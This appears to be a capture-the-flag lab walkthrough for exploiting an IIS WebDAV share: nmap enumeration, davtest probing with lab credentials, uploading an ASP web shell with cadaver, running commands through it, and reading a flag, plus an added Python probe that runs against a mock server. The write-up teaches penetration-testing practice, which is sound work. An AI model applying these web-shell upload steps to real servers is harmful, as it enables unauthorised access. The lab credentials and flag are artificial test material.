Name Windows: IIS Server DAVTest
URL [Link]
Type Windows Service Exploitation: IIS
Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.
Step 1: Checking the target IP address.
Note: The target IP address is stored in the “target” file.
Command: cat /root/Desktop/target
Step 2: Run a Nmap scan against the target IP.
Command: nmap [Link]
Step 3: The scan shows that multiple ports are open. We will focus on port 80, where the IIS web server is running.
Run the http-enum Nmap script to discover interesting directories.
Command: nmap --script http-enum -sV -p 80 [Link]
The script finds a /webdav directory, and requests to it are answered with HTTP 401 (Unauthorized), i.e. the path is protected by authentication.
Step 4: Running the davtest tool.
Command: davtest -url [Link]
The unauthenticated run confirms that the /webdav path is protected by HTTP Basic authentication. The lab provides the credentials bob:password_123321, so we run davtest again with them:
Command: davtest -auth bob:password_123321 -url [Link]
davtest succeeds in uploading a test file for almost every file type it tries to the /webdav directory, and reports EXEC for three of them: asp, txt, and html. EXEC means that requesting the uploaded file back makes the server process it rather than return the raw bytes; the EXEC result for .asp is what tells us an uploaded ASP web shell will actually run.
Step 5: Upload an .asp backdoor to the /webdav directory on the target machine using the cadaver utility.
The .asp backdoor is present in the /usr/share/webshells/asp/ directory, i.e.
/usr/share/webshells/asp/[Link]
Command: cadaver [Link]
Enter credentials: bob:password_123321
We can now interact with the webdav directory from the cadaver prompt.
Step 6: Upload the asp backdoor to the webdav directory of the IIS web server.
Command: put /usr/share/webshells/asp/[Link]
ls
The ls output shows the backdoor has been uploaded successfully.
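The exchange behind steps 4 to 6, as an added example that is not part of the lab text or of the davtest/cadaver projects: a small client that sends an unauthenticated PUT to learn whether the share is protected, retries with HTTP Basic credentials, uploads one marker file per extension, and counts an upload only when the file can be fetched back (davtest's SUCCEED plus cadaver's ls in one step). The target is a constructed in-process mock of the lab's IIS share, not real IIS; the extension list, the two refused extensions and the 403 status are assumptions made for the example, while the /webdav path and the credentials bob:password_123321 are the values the lab provides.

```python
"""davtest-style WebDAV upload probe against a constructed mock target.
Added example; not code from the lab or from davtest/cadaver."""
import base64
import http.client
import threading
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlsplit

# Subset of the extensions davtest tries (assumption for this example).
EXTENSIONS = ["txt", "html", "asp", "aspx", "php", "jsp", "cfm", "pl", "shtml", "cgi"]
MARKER = "davtest-style-probe"


def basic_auth(user, password):
    """Authorization header value for HTTP Basic auth (user:pass, base64)."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def request(base_url, method, path, body=None, auth=None):
    """Send one HTTP request; return (status, headers, body)."""
    u = urlsplit(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    headers = {"Content-Type": "application/octet-stream"}
    if auth:
        headers["Authorization"] = auth
    conn.request(method, path, body=body, headers=headers)
    resp = conn.getresponse()
    data = resp.read()
    conn.close()
    return resp.status, dict(resp.getheaders()), data


def probe_webdav(base_url, share="/webdav", creds=None):
    """Unauthenticated PUT first (is the share protected?), then, if creds are
    given, one PUT per extension; an upload is 'uploaded' only if a GET
    returns the marker content, otherwise the PUT status is recorded."""
    result = {"auth_required": False, "challenge": None, "uploaded": [], "rejected": {}}
    auth = basic_auth(*creds) if creds else None
    status, headers, _ = request(base_url, "PUT", f"{share}/{MARKER}.txt", b"x")
    if status == 401:
        result["auth_required"] = True
        result["challenge"] = headers.get("WWW-Authenticate")
        if auth is None:
            return result
    for ext in EXTENSIONS:
        path = f"{share}/{MARKER}.{ext}"
        status, _, _ = request(base_url, "PUT", path, MARKER.encode(), auth=auth)
        if status in (200, 201, 204):
            _, _, body = request(base_url, "GET", path, auth=auth)
            if body == MARKER.encode():
                result["uploaded"].append(ext)
                continue
        result["rejected"][ext] = status
    return result


class MockIISWebDav(BaseHTTPRequestHandler):
    """Constructed stand-in for the lab target: Basic auth on /webdav, PUT
    stores the body, GET returns it. Two extensions are refused with 403 to
    show a partially successful run (assumption, not IIS's real rules)."""
    files = {}
    refused = {"aspx", "php"}
    challenge = [("WWW-Authenticate", 'Basic realm="webdav"')]

    def _authorized(self):
        return self.headers.get("Authorization") == basic_auth("bob", "password_123321")

    def _reply(self, status, body=b"", extra=()):
        self.send_response(status)
        for name, value in extra:
            self.send_header(name, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_PUT(self):
        body = self.rfile.read(int(self.headers.get("Content-Length", 0)))
        if not self.path.startswith("/webdav/"):
            return self._reply(404)
        if not self._authorized():
            return self._reply(401, extra=self.challenge)
        if self.path.rsplit(".", 1)[-1] in self.refused:
            return self._reply(403)
        self.files[self.path] = body
        self._reply(201)

    def do_GET(self):
        if not self._authorized():
            return self._reply(401, extra=self.challenge)
        body = self.files.get(self.path)
        if body is None:
            return self._reply(404)
        self._reply(200, body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def run_demo():
    """Start the mock on a free port, probe without and with credentials."""
    server = ThreadingHTTPServer(("127.0.0.1", 0), MockIISWebDav)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    base = f"http://127.0.0.1:{server.server_address[1]}"
    try:
        return probe_webdav(base), probe_webdav(base, creds=("bob", "password_123321"))
    finally:
        server.shutdown()


if __name__ == "__main__":
    unauth, authed = run_demo()
    print("unauthenticated:", unauth)
    print("as bob:", authed)
```

Against a real target replace the mock with the lab URL and keep the GET-back check: a PUT that returns 201 but whose GET returns the raw marker for .asp means the file is stored but not executed, which is the difference between davtest's SUCCEED and EXEC results and decides whether the web shell in step 7 will run.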
Step 7: Access the backdoor in the Firefox browser.
URL: [Link]
Enter credentials: bob:password_123321
We can enter Windows commands in the yellow highlighted field.
Check the current user.
URL: [Link]
The output shows that the web shell runs as the IIS application pool identity (IIS APPPOOL), a low-privileged service account rather than an administrator.
Step 8: Read the flag.
Check the contents of the C:\ drive.
URL: [Link]
The listing shows a [Link] file in the C:\ drive. Read it.
URL: [Link]
This reveals the flag.
Flag: 0cc175b9c0f1b6a831c399e269772661
References:
1. DAVTest ([Link])
2. Cadaver ([Link])
3. ASP Webshell ([Link])